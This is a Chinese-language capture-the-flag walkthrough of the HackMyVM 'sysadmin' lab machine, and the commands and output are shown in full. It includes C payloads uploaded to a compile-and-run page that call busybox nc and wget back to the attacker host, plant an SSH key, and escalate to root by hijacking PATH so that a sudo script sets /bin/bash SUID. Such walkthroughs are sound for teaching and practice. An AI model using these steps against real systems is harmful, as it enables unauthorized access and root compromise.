【打靶日记】HMV 之 sysadmin
前言与工具
攻击机:192.168.56.247
靶机:192.168.56.210
工具:
- arp-scan
- nmap
- curl
- nc
信息收集
主机发现
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# arp-scan -I eth1 -l
Interface: eth1, type: EN10MB, MAC: 00:0c:29:d2:97:44, IPv4: 192.168.56.247
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.56.100 08:00:27:c6:2f:5e PCS Systemtechnik GmbH
192.168.56.210 08:00:27:22:3d:b7 PCS Systemtechnik GmbH3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 4.731 seconds (54.11 hosts/sec). 3 responded
端口扫描
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# nmap 192.168.56.210 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-31 07:15 EDT
Nmap scan report for 192.168.56.210
Host is up (0.0018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:22:3D:B7 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 26.75 seconds
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# curl 192.168.56.210
<!doctype html>
<html lang="en">
<head><meta charset="utf-8"><title>C Code Upload</title><meta name="viewport" content="width=device-width,initial-scale=1"><style>/* ---------- RESET ---------- */*{box-sizing:border-box;margin:0;padding:0}body{font-family:Arial,Helvetica,sans-serif;color:#333;padding:30px;background:#fff}/* ---------- CARD ---------- */.card{max-width:420px;margin:0 auto;border:1px solid #ccc;border-radius:8px;padding:25px 30px;box-shadow:0 2px 6px rgba(0,0,0,.1);text-align:center;}.card h1{font-size:24px;margin-bottom:8px}.card p.sub{font-size:14px;color:#666;margin-bottom:20px}/* ---------- ALERT ---------- */.alert{padding:10px 12px;border-radius:6px;font-size:14px;margin-bottom:20px;text-align:left}.alert.success{background:#e7f7ed;color:#0e5132;border-left:4px solid #28a745}.alert.error{background:#fce7e7;color:#721c24;border-left:4px solid #dc3545}.alert.warn{background:#fff3cd;color:#856404;border-left:4px solid #ffc107}/* ---------- FORM ---------- */form input[type=file]{width:100%;margin-bottom:15px;padding:8px;border:1px solid #bbb;border-radius:4px}form input[type=submit]{width:100%;padding:10px;background:#1976d2;color:#fff;border:0;border-radius:4px;cursor:pointer}form input[type=submit]:hover{background:#125a9c}/* ---------- FOOTER ---------- */.footer{margin-top:20px;font-size:12px;color:#888}</style>
</head>
<body><!-- main card --><div class="card"><h1>C Code Upload Platform</h1><p class="sub">Upload your <code>.c</code> file to compile and run.</p><!-- PHP upload handler --><!-- upload form --><form action="" method="post" enctype="multipart/form-data"><input type="file" name="src" accept=".c" required><input type="submit" value="Upload & Compile"></form><div class="footer"><b>Notice:</b> Your compiled binary will be deleted immediately after execution.</div></div><!--gcc -std=c11 -nostdinc -I/var/www/include -z execstack -fno-stack-protector -no-pie test.c -o a.out-->
</body>
</html>
信息总结
-
主机地址为:
192.168.56.210 -
开放端口有:
22/ssh, 80/http -
80端口:
-
上传C文件并编译执行,执行后删除
-
gcc -std=c11 -nostdinc -I/var/www/include -z execstack -fno-stack-protector -no-pie test.c -o a.out -
-std=c11:指定使用 C11 标准进行编译-nostdinc:不搜索标准系统头文件目录-I/var/www/include:添加/var/www/include作为头文件搜索目录-z execstack:允许栈执行,关闭栈保护机制-fno-stack-protector:禁用栈保护机制(关闭缓冲区溢出检测)-no-pie:不生成位置无关的可执行文件test.c:源文件-o a.out:指定输出的可执行文件名为 a.out
-
漏洞利用(文件上传)
任务:不使用标准头文件获得shell
先试试直接声明system,看能不能运行
//try.c
int system(const char *command); //不通过<stdlib.h>声明system
int main() {system("busybox nc 192.168.56.247 9427"); return 0;
}
#发送终端
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# curl -X POST -F "src=@try.c" http://192.168.56.210:80
(...)#监听终端
┌──(root㉿kali)-[~]
└─# nc -lvp 9427
listening on [any] 9427 ...
192.168.56.210: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.247] from (UNKNOWN) [192.168.56.210] 36106
发现靶机成功编译执行了,连接了一下9427端口
弹shell的话,在被禁了头文件后的话,有点困难,使用可以换成写入ssh公钥
①查看当前用户用户名
//revname.c
int system(const char *command);
int main() {system("echo $(whoami) | busybox nc 192.168.56.247 80");return 0;
}
#发送终端
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# curl -X POST -F "src=@revname.c" http://192.168.56.210:80
(...)#监听终端
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.210 - - [31/Oct/2025 08:20:01] code 400, message Bad request syntax ('echo')
192.168.56.210 - - [31/Oct/2025 08:20:01] "echo" 400 -
反弹出当前用户为**echo**
②将攻击机的ssh公钥写入echo用户的.ssh/authorized_keys中
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# cat ~/.ssh/id_rsa.pub > ./authorized_keys
将公钥写入python运行的http服务目录下
//putkey.c
int system(const char *command);
int main() {system("mkdir -p ~/.ssh && busybox wget 192.168.56.247/authorized_keys -O ~/.ssh/authorized_keys");return 0;
}
#发送终端
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# curl -X POST -F "src=@putkey.c" http://192.168.56.210:80#监听终端
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.210 - - [31/Oct/2025 08:20:01] code 400, message Bad request syntax ('echo')
192.168.56.210 - - [31/Oct/2025 08:20:01] "echo" 400 -
192.168.56.210 - - [31/Oct/2025 08:29:01] "GET /authorized_keys HTTP/1.1" 200 -
返回"GET /authorized_keys HTTP/1.1" 200 -,成功将攻击机的ssh公钥写入靶机
③使用公钥登录靶机echo用户
┌──(root㉿kali)-[~/xhh/25-11/sysadmin]
└─# ssh echo@192.168.56.210
Linux Sysadmin 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
echo@Sysadmin:~$ ls
user.txt
echo@Sysadmin:~$
成功拿到用户echo的shell
权限提升
看id、sudo -l有什么可以利用的
echo@Sysadmin:~$ id
uid=1000(echo) gid=1000(echo) groups=1000(echo)
echo@Sysadmin:~$ sudo -l
Matching Defaults entries for echo on Sysadmin:!env_reset, mail_badpass, !env_reset, always_set_homeUser echo may run the following commands on Sysadmin:(root) NOPASSWD: /usr/local/bin/system-info.sh
!env_reset:不重置环境变量,可以命令劫持(root) NOPASSWD: /usr/local/bin/system-info.sh:不用密码可以用root权限执行system-info.sh
看一下system-info.sh有什么命令可以劫持
echo@Sysadmin:~$ cat /usr/local/bin/system-info.sh
#!/bin/bash#===================================
# Daily System Info Report
#===================================echo "Starting daily system information collection at $(date)"
echo "------------------------------------------------------"echo "Checking disk usage..."
df -hecho "Checking log directory..."
ls -lh /var/log/
find /var/log/ -type f -name "*.gz" -mtime +30 -exec rm {} \;echo "Checking critical services..."
systemctl is-active sshd
systemctl is-active cronecho "Collecting CPU and memory information..."
cat /proc/cpuinfo
free -mecho "------------------------------------------------------"
echo "Report complete at $(date)"
df(实际路径应为/bin/df)ls(实际路径应为/bin/ls)find(实际路径应为/usr/bin/find)systemctl(实际路径应为/bin/systemctl)cat(实际路径应为/bin/cat)free(实际路径应为/usr/bin/free)
发现多个可以劫持的命令,拿先执行的代码举例子
echo@Sysadmin:~$ echo '#!/bin/bash' > /tmp/df #声明使用bash
echo@Sysadmin:~$ echo 'chmod +s /bin/bash' >> /tmp/df #将恶意代码追加到/tmp/df中
echo@Sysadmin:~$ chmod +x /tmp/df #给/tmp/df执行权限
echo@Sysadmin:~$ export PATH="/tmp:$PATH" #将/tmp目录添加到PATH的最前面,优先于系统默认
echo@Sysadmin:~$ sudo /usr/local/bin/system-info.sh
(...)
echo@Sysadmin:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
成功执行恶意代码
echo@Sysadmin:~$ bash -p
bash-5.0# id
uid=1000(echo) gid=1000(echo) euid=0(root) egid=0(root) groups=0(root),1000(echo)
bash-5.0# cd /root
bash-5.0# ls
root.txt
成功提权拿到rootshell